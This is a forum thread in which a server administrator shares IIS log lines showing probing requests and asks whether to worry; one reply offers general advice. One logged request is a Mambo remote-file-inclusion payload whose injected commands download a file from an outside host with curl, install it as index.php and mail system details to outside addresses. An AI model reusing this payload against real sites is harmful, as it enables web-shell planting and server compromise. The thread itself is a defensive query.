473,382 Members | 1,809 Online
Bytes | Software Development & Data Engineering Community
Post Job

Home Posts Topics Members FAQ

home > topics > iis / internet information server > questions > possible hijacking help

Join Bytes to post your question to a community of 473,382 software developers and data experts.

Possible hijacking help

Plater
7,872 Expert 4TB
I have been looking at the logs for my various webservers and have noticed some "polling" going on that looks suspicious:

I have had one server up for about 3days now on 8080 and roughly every hour I recieve a request like: (note: that is not my domain, someone entered that themselves)
"GET http://hacker.org.ru/prxjdg.php"
yes, with the http in there and everything. That server is created of my own hand so I know exactly how it handles it.

So then I thought to check my iis server on port 80, and it's got wierder requests.
A common offending line: (I have nothing called mamba....)
Expand|Select|Wrap|Line Numbers
  1. 2007-06-04 21:14:23 W3SVC1 x.x.x.x GET /mambo/index2.php _REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://qoo-pon.com/css/style?&cmd=cd%20cache;curl%20-O%20http://qoo-pon.com/css/style;mv%20cm%20index.php;rm%20-rf%20cm*;uname%20-a%20|%20mail%20-s%2074.92.34.25/mambo/_uname_i2%20ursu1cc@gmail.com;uname%20-a%20|%20mail%20-s%20uname_i2_74.92.34.25%20politia112_inactiune@yahoo.com;echo| 80 - 69.219.112.137 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) 404 0 3
  2.  
Should I be worried about this? IIS is returning 404 errors for it, but is there harm in these things?
Any thoughts?

Thanks

PS: If this is the wrong place to post, feel free to move it to where it needs to be
Jul 30 '07 #1
1 2430
kenobewan
4,871 Expert 4TB
For what is worth, often these things happen when hackers try to sabotage a site by entering a query where you use sql, eg a search function. If have any doubts about the cleanliness of your box, it may be worth checking this at a quiet period. Often the intention is to bring a site down with the sheer amount of activity, so would suggest searching for ways to minimise this risk. HTH.
Aug 1 '07 #2

Sign in to post your reply or Sign up for a free account.

Similar topics

27
Reality Check: Session Hijacking
by: mrbog | last post by:
Tell me if my assertion is wrong here: The only way to prevent session hijacking is to NEVER store authentication information (such as name/password) in the session. Well, to never authenticate...
PHP
4
is it possible to do this? (resize image from url only)
by: Julia Briggs | last post by:
I am struggling to create a PHP function that would take a specified image (JPG, GIF or PNG) from a link, and resize it down to a thumbnail so it will always fit in a 200x250 space. I am hoping...
PHP
20
Sending a path to a FILE control ( it has to be possible! )
by: CHIN | last post by:
Hi all.. here s my problem ( maybe some of you saw me on other groups, but i cant find the solution !! ) I have to upload a file to an external site, so, i made a .vbs file , that logins to...
.NET Framework
6
Is DevelopersDex Hijacking Usenet?
by: Tim Marshall | last post by:
Related to another fellow's post in a thread here, I did a google search on "Sent via Developersdex" for cdma - nothing showed up. Presumeably this means when a poster goes through this...
Microsoft Access / VBA
2
make a spell and grammar check possible in text area of a web page.
by: Bhupesh Naik | last post by:
This is a query regarding my problem to make a spell and grammar check possible in text area of a web page. We have aspx pages which are used to construct letters. The browser based screens...
ASP.NET
3
Session Hijacking?
by: Kevin | last post by:
Hello all, I have written an asp.net application using C# and am having an issue in multiple-user environments. If one user is logged in (using Windows authentication), everything is fine. Once...
ASP.NET
13
Is the way i do, secure enought to avoid session hijacking
by: Hope Paka | last post by:
I am storing user login information (not password) in the session. I also use, cookieless session. I realized that, if someone copy-pastes the URL after he/she logged in to the system to another...
ASP.NET
5
Possible SET SESSION AUTHORIZATION bug
by: Chris Ochs | last post by:
It doesn't currently seem possible to switch between different users using SET SESSION AUTHORIZATION. If I log in as the superuser and switch to another user that works, but if I then switch to a...
PostgreSQL Database
1
possible combination of numbers
by: AAA | last post by:
hi, I'll explain fastly the program that i'm doing.. the computer asks me to enter the cardinal of a set X ( called "dimX" type integer)where X is a table of one dimension and then to fill it...
C / C++
40
Is it possible to run a command on the client computer ?
by: navti | last post by:
I saw here http://java.sun.com/javase/6/docs/technotes/tools/share/jsdocs/index.html that javascript has built-in methods such as cp, dir, date etc how do i get these to run on the client...
Javascript
0
Wordpress or something else?
by: Faith0G | last post by:
I am starting a new it consulting business and it's been a while since I setup a new website. Is wordpress still the best web based software for hosting a 5 page website? The webpages will be...
Content Management Systems
0
isladogs
Access Europe: Command bars, the Access Shortcut Tool and a simple Audit Log - Wed 3 April
by: isladogs | last post by:
The next Access Europe User Group meeting will be on Wednesday 3 Apr 2024 starting at 18:00 UK time (6PM UTC+1) and finishing by 19:30 (7.30PM). In this session, we are pleased to welcome former...
General
0
One-click Importing Excel Data into a*Database
by: ryjfgjl | last post by:
In our work, we often need to import Excel data into databases (such as MySQL, SQL Server, Oracle) for data analysis and processing. Usually, we use database tools like Navicat or the Excel import...
Microsoft Excel
0
How to turn on java script in a villaon keypad mobile phone
by: Charles Arthur | last post by:
How do i turn on java script on a villaon, callus and itel keypad mobile phone
Java
0
Basic Javascript concepts
by: aa123db | last post by:
Variable and constants Use var or let for variables and const fror constants. Var foo ='bar'; Let foo ='bar';const baz ='bar'; Functions function $name$ ($parameters$) { } ...
Javascript
0
Batch import of multiple excel files into the database
by: ryjfgjl | last post by:
If we have dozens or hundreds of excel to import into the database, if we use the excel import function provided by database editors such as navicat, it will be extremely tedious and time-consuming...
Data Management
0
BarryA
Navigating the Data Structures and Algorithms (DSA)
by: BarryA | last post by:
What are the essential steps and strategies outlined in the Data Structures and Algorithms (DSA) roadmap for aspiring data scientists? How can individuals effectively utilize this roadmap to progress...
Algorithms / Advanced Math
1
Looking to do Android software development, any suggestions? Is flutter better?
by: nemocccc | last post by:
hello, everyone, I want to develop a software for my android phone for daily needs, any suggestions?
General
1
Is that possible of reading the .csv file in column wise and the column have different lengths ?
by: Sonnysonu | last post by:
This is the data of csv file 1 2 3 1 2 3 1 2 3 1 2 3 2 3 2 3 3 the lengths should be different i have to store the data by column-wise with in the specific length. suppose the i have to...
C / C++

By using Bytes.com and it's services, you agree to our Privacy Policy and Terms of Use.

To disable or enable advertisements and analytics tracking please visit the manage ads & tracking page.

BYTES.COM © 2024
About Bytes
Terms Of Use
Privacy Policy
Sitemap
Advertise on Bytes:
Post a Job
Sponsored Posts
Platinum & Gold Sponsors
Hire Now!